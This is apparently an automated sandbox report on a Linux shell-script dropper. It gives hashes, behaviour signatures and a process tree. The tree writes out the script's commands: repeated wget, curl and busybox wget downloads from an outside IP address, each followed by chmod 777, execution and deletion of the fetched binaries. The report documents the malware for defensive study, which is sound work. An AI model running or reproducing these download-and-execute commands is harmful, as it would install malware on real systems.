Analysis
-
max time kernel
8s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:47
Static task
static1
Behavioral task
behavioral1
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh
-
Size
10KB
-
MD5
60c5521dc77c48a75842ba0dbc3fae7c
-
SHA1
9ddfd137b35be8207eb3889a9a93c23ce142e184
-
SHA256
d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490
-
SHA512
da9d12e38093b4ed8181f08e6e568d784d062e018ee58f085668c97a33254dcbf2a1dbe9b2ac4098817bfa045b661fb905ef37999c6fe3019ca1e504eb192d6c
-
SSDEEP
192:jorwWDEg9skLEcnrq/7DlhMYDgAiSEg9sk+zjnrq/7DPMYDgAiA:juwWpEt9EdKKA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 758 chmod 666 chmod 677 chmod 683 chmod 697 chmod 711 chmod 726 chmod 744 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS 667 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk 678 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj 684 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv 698 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu 713 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR 727 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr 746 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG 759 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj curl File opened for modification /tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv curl File opened for modification /tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu curl File opened for modification /tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR curl File opened for modification /tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr curl File opened for modification /tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG curl File opened for modification /tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS curl File opened for modification /tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk curl
Processes
-
/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh/tmp/d06bb742088f130f3ef40c2cbf36a2817a0990f0df29eb66bfab5f2b7deef490.sh1⤵PID:637
-
/bin/rm/bin/rm bins.sh2⤵PID:639
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:641
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:653
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:662
-
-
/bin/chmodchmod 777 BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- File and Directory Permissions Modification
PID:666
-
-
/tmp/BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS./BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵
- Executes dropped EXE
PID:667
-
-
/bin/rmrm BYmYv0y18L0k3P5gDTI6OMMP6ssgam6KJS2⤵PID:668
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:670
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:674
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:676
-
-
/bin/chmodchmod 777 rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk./rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵
- Executes dropped EXE
PID:678
-
-
/bin/rmrm rcbc5jO4G7u85ju9kKzzxLCvTDrSJbsHZk2⤵PID:679
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:680
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:682
-
-
/bin/chmodchmod 777 De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj./De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm De1QXOpFjsGUj7dZOZF7uIXZ2nuwjAsRBj2⤵PID:685
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:686
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:694
-
-
/bin/chmodchmod 777 lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv./lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵
- Executes dropped EXE
PID:698
-
-
/bin/rmrm lIZ4nqbZQP5jcXkEXyDkf9yV2NHMSMUjrv2⤵PID:699
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:700
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:704
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:708
-
-
/bin/chmodchmod 777 p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/p7lS1Hib6mkhrAbNonz58r7ALivEnozztu./p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm p7lS1Hib6mkhrAbNonz58r7ALivEnozztu2⤵PID:714
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:723
-
-
/bin/chmodchmod 777 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR./3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm 3ALeJgt8qCSdO4bmTwZTPQyFRiQmelMErR2⤵PID:729
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:740
-
-
/bin/chmodchmod 777 LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr./LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm LwKEpW7w0zNYDuijWJUvnUyuH4WX6BZezr2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:757
-
-
/bin/chmodchmod 777 TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG./TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵
- Executes dropped EXE
PID:759
-
-
/bin/rmrm TTCENn689A2RBaPVAnTWkhra3DUcADJ7bG2⤵PID:760
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/FjXt1N23N2G8hbOp5xKBAmi2sAEoYbtrcJ2⤵PID:761
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97